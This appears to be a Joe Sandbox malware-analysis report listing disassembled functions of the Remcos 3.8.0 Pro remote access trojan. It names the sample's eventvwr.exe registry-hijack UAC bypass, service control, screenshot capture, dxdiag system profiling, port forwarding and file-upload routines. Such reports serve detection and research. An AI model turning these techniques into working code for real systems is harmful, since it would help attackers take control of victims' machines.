Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$@%G$@%G$Temp
API String ID: 1704390241-4139030828
Opcode ID: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
Instruction ID: 980de7e6e99344695fa922fac5fad97fc57b46ec9d0f9c422bd6bd0d3fbbc04a
Opcode Fuzzy Hash: 08cb1755ce7b468823e10bc19469487db811a439f2e1fee2786586d5cf0c4217
Instruction Fuzzy Hash: 48419131900209ABDB14FB61DC56AEEB739AF50308F50417EF505760E2EF785E8ACB99

Function 004066A6 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 78COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
ExitProcess.KERNEL32 ref: 00406782

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 00406730
Software\Classes\mscfile\shell\open\command, xrefs: 0040673F
mscfile\shell\open\command, xrefs: 004066D4
eventvwr.exe, xrefs: 0040674F
H"G, xrefs: 004066E8
open, xrefs: 0040676E
origmsc, xrefs: 00406710

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExecuteExitProcessShell
String ID: C:\Windows\SysWOW64\SndVol.exe$H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
API String ID: 1124553745-1756190855
Opcode ID: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
Opcode Fuzzy Hash: c9eebefaaca7104524450088b03de3167d5d157c3cb18eb3619efb5a887ad6d4
Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE

Function 00418AC3 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041843C,00000000), ref: 00418AD2
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041843C,00000000), ref: 00418AE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418AF6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041843C,00000000), ref: 00418B05
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B16
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041843C,00000000), ref: 00418B19

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
Instruction ID: 27c4ffebcf7932a5624e60d5a3802e7503a1161fac6a42b5cc64803f4be6ae02
Opcode Fuzzy Hash: 5ca2c9f4f824d20fd2b15ead523db82676a1b8751022075e59f45b476e20e695
Instruction Fuzzy Hash: A211E9715002186FD610EF64DC89CFF3B6CDF41B96741012AFA0593192DF789D469AF5

Function 00445631 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00445645

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00445651
_free.LIBCMT ref: 0044565C
_free.LIBCMT ref: 00445667
_free.LIBCMT ref: 00445672
_free.LIBCMT ref: 0044567D
_free.LIBCMT ref: 00445688
_free.LIBCMT ref: 00445693
_free.LIBCMT ref: 0044569E
_free.LIBCMT ref: 004456AC

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction ID: 08dc7793ba969bb8ae61e50cce6790fa76a3b05f45cdd3d63b195ce4761959f1
Opcode Fuzzy Hash: 93d31162751b94c5375648fc1d7c6d5428524314512021667e8ac2086323d142
Instruction Fuzzy Hash: A511CB7610010CBFDB01EF55C986CDD3B65FF04759B4284AAFA885F222EA35DF509B88

Function 00417F6A Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00417F6F
GdiplusStartup.GDIPLUS(00471668,?,00000000), ref: 00417FA1
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041802D
Sleep.KERNEL32(000003E8), ref: 004180B3
GetLocalTime.KERNEL32(?), ref: 004180BB
Sleep.KERNEL32(00000000,00000018,00000000), ref: 004181AA

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00418050, 00418071, 004180DF
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00418055

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-3790400642
Opcode ID: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
Instruction ID: ff50de85f816598f14f139fcbfe24147e98e2bb745fd097185ef2e944e73ca26
Opcode Fuzzy Hash: 384f29ba9d6e9cc4eb2ffe2d10ebc108aeca390d7ff074f032fb6a7982b51f69
Instruction Fuzzy Hash: 98516071A001549BCB04BBB5C8529FD76A8AF55308F04403FF805A71E2EF7C5E85C799

Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107

Strings

log, xrefs: 004531AD, 004531B9
sqrt, xrefs: 0045328B
pow, xrefs: 004531EB, 00453297, 004532AA
log10, xrefs: 00453151, 004531A1
asin, xrefs: 00453273
acos, xrefs: 0045327F
exp, xrefs: 004531CC, 0045322E

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D

Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Sleep.KERNEL32(00000064), ref: 00415A46
DeleteFileW.KERNEL32(00000000), ref: 00415A7A

Strings

\sysinfo.txt, xrefs: 004159C5
/t , xrefs: 004159F9
temp, xrefs: 004159CA
open, xrefs: 00415A14
dxdiag, xrefs: 00415A0F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: eb407d141be18b2fbf158262ca999d871c43cfb7c9dc42f29a5b9d793daecc2f
Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
Opcode Fuzzy Hash: eb407d141be18b2fbf158262ca999d871c43cfb7c9dc42f29a5b9d793daecc2f
Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99

Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

AllocConsole.KERNEL32(00000001), ref: 0041AA5D
ShowWindow.USER32(00000000,00000000), ref: 0041AA76

Strings

* Remcos v, xrefs: 0041AAB4
CONOUT$, xrefs: 0041AA89
3.8.0 Pro, xrefs: 0041AAC2
* BreakingSecurity.net, xrefs: 0041AAD0
--------------------------, xrefs: 0041AAA6
--------------------------, xrefs: 0041AADE

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AllocConsoleShowWindow
String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
API String ID: 4118500197-4025029772
Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D

Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B

Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
TranslateMessage.USER32(?), ref: 0041B29E
DispatchMessageA.USER32(?), ref: 0041B2A8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5

Strings

Remcos, xrefs: 0041B26D

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68

Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
Opcode Fuzzy Hash: 694ad35582159027617efb05aef66a3d5b04e60223d1b3b6b0413602b7ba056d
Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B

Function 00452DBB Relevance: 13.8, APIs: 9, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00452A89: CreateFileW.KERNEL32(00000000,00000000,?,00452E64,?,?,00000000,?,00452E64,00000000,0000000C), ref: 00452AA6

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452ECF
__dosmaperr.LIBCMT ref: 00452ED6
GetFileType.KERNEL32(00000000), ref: 00452EE2
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FF8BC35D), ref: 00452EEC
__dosmaperr.LIBCMT ref: 00452EF5
CloseHandle.KERNEL32(00000000), ref: 00452F15
CloseHandle.KERNEL32(00000000), ref: 0045305F
GetLastError.KERNEL32 ref: 00453091
__dosmaperr.LIBCMT ref: 00453098

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction ID: def4621c7e831d5678052e1043e56ea9e2bfce8be848437acb5cac56d61a7e39
Opcode Fuzzy Hash: 474c31a6c8ccfba43807a2a750eddd9e1d52ca803bebdbe2fa86fef5e1c33935
Instruction Fuzzy Hash: CAA15832A101049FDF19EF68D8417AE7BB1AB0A325F14015FFC419B392DB798D1ACB5A

Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045123C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045100F
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451092
__alloca_probe_16.LIBCMT ref: 004510CA
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0045123C,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 00451125
__alloca_probe_16.LIBCMT ref: 00451174
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045113C

Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0045123C,00000000,00000000,?,00000001,?,?,?,?), ref: 004511B8
__freea.LIBCMT ref: 004511E3
__freea.LIBCMT ref: 004511EF

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: 5dd519cdf614e137a58fad772f0fbbc90d71aea9dd9d09398d72cbf8dce97a11
Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
Opcode Fuzzy Hash: 5dd519cdf614e137a58fad772f0fbbc90d71aea9dd9d09398d72cbf8dce97a11
Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768

Function 048F2631 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 417fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 048F264A

Part of subcall function 048FA6F1: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,048E4DF4), ref: 048FA718

Part of subcall function 048F763E: CloseHandle.KERNEL32(048E4E6D,?,?,048E4E6D,00462E24), ref: 048F7654
Part of subcall function 048F763E: CloseHandle.KERNEL32($.F,?,?,048E4E6D,00462E24), ref: 048F765D

DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 048F2937
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 048F2967
DeleteFileW.KERNEL32(00000000,00462E24,00462E24,00462E24), ref: 048F299D

Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE

Strings

@#G, xrefs: 048F2BDD
@#G, xrefs: 048F2B0A
$.F, xrefs: 048F274E

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: $.F$@#G$@#G
API String ID: 1937857116-4208588984
Opcode ID: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
Instruction ID: 7037c899519e3dba163fa41f78eec871387724b433c2d6831e210f4a5c4bcb76
Opcode Fuzzy Hash: bd53cf9864bd20e9c524ce1cfd37af81de888470282f81bcb092bebe0936cb7c
Instruction Fuzzy Hash: A6F185316183459AE328FB39D850AFF77D8AF95304F404E5DA586C31A0EEF4BA49C653

Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3

_memcmp.LIBVCRUNTIME ref: 00442935
_free.LIBCMT ref: 004429A6
_free.LIBCMT ref: 004429BF
_free.LIBCMT ref: 004429F1
_free.LIBCMT ref: 004429FA
_free.LIBCMT ref: 00442A06

Strings

C, xrefs: 004427F3

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 0b4de82b44ea59e8747fa3c20bc7230b1bed574c57169c5712789c008706209c
Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
Opcode Fuzzy Hash: 0b4de82b44ea59e8747fa3c20bc7230b1bed574c57169c5712789c008706209c
Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44

Function 04923423 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 049264BD: GetLastError.KERNEL32(?,0491FC32,0491932D,0491FC32,00471E90,?,0491D9B2,FF8BC35D,00471E90,00471E90), ref: 049264C1
Part of subcall function 049264BD: _free.LIBCMT ref: 049264F4
Part of subcall function 049264BD: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 04926535
Part of subcall function 049264BD: _abort.LIBCMT ref: 0492653B

_memcmp.LIBVCRUNTIME ref: 049236CD
_free.LIBCMT ref: 0492373E
_free.LIBCMT ref: 04923757
_free.LIBCMT ref: 04923789
_free.LIBCMT ref: 04923792
_free.LIBCMT ref: 0492379E

Strings

C, xrefs: 0492358B

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
Instruction ID: 5c2beaadb35068ae2ad9ac5a6dc4572f890f7ba6fe3e0509dd100cdd68ae0ecc
Opcode Fuzzy Hash: 432fc3ea507ab00d5c61cbebfc7d6860faf6a87f9b6526557229100be8563697
Instruction Fuzzy Hash: 01B13A75A012299FDB24DF28C984AADB7B9FF48304F1045EAD80AA7354E735BE90CF40

Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

udp, xrefs: 0041349C
tcp, xrefs: 004134C9

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A

Function 048F14FB Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 048F0F99: SetLastError.KERNEL32(0000000D,048F1519,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,048F14F7), ref: 048F0F9F

SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,048F14F7), ref: 048F1534
GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,048F14F7), ref: 048F15A2
SetLastError.KERNEL32(0000000E), ref: 048F15C6

Part of subcall function 048F14A0: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,048F15E4,?,00000000,00003000,00000004,00000000), ref: 048F14B0

GetProcessHeap.KERNEL32(00000008,00000040), ref: 048F160D
RtlAllocateHeap.NTDLL(00000000), ref: 048F1614
SetLastError.KERNEL32(0000045A), ref: 048F1727

Part of subcall function 048F1874: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,048F1734), ref: 048F18E4
Part of subcall function 048F1874: HeapFree.KERNEL32(00000000), ref: 048F18EB

Strings

$.F, xrefs: 048F14FF

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$Process$AllocAllocateFreeInfoNativeSystemVirtual
String ID: $.F
API String ID: 2227336758-1421728423
Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
Instruction ID: 5ccca61dbef773d765d467af74286a081ecdad5fe931ef5c48ee803f44370018
Opcode Fuzzy Hash: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
Instruction Fuzzy Hash: 4161F570200601EFD7509F69CD88B6A7BE5BF88744F444B19EA09CB285EBB4FC51CBA5

Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0040FF79
inet_ntoa.WS2_32(?), ref: 00410014

Strings

StartForward, xrefs: 004100D8
StopForward, xrefs: 004100F5
GetDirectListeningPort, xrefs: 00410117
StartReverse, xrefs: 004100E4
StopReverse, xrefs: 00410106

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 668acd623b90f3b0cdf34578d0f5251299bc4f70ab8d2d7e652f4e1ee58cd933
Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
Opcode Fuzzy Hash: 668acd623b90f3b0cdf34578d0f5251299bc4f70ab8d2d7e652f4e1ee58cd933
Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF

Function 048F4574 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 048F45C3
LoadLibraryA.KERNEL32(?), ref: 048F4605
LoadLibraryA.KERNEL32(?), ref: 048F4664
GetProcAddress.KERNEL32(00000000,?), ref: 048F468C

Strings

`3A, xrefs: 048F4588
ou, xrefs: 048F4613
%3A, xrefs: 048F45A8

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressDirectoryProcSystem
String ID: %3A$`3A$ou
API String ID: 4217395396-4073855258
Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction ID: 1516d43e6f2df8340b93864a7e9ac471c50c450d41fbfd52bece8002397c1136
Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
Instruction Fuzzy Hash: A331C771502315ABE720AF24DC44D9FB7EC9F88B55F450B26FE44D3210E778E9448AAA

Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E

Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16

CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36

Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,?,00471E90,00404C29,00000000,?,?,?,00471E90,?), ref: 00404B85
Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3

Strings

.part, xrefs: 00406A1A

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
Opcode Fuzzy Hash: 902e130b94aad18369189187a8e6e7e21762ac87eb431447f7a89350bc37b519
Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A

Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

APIs

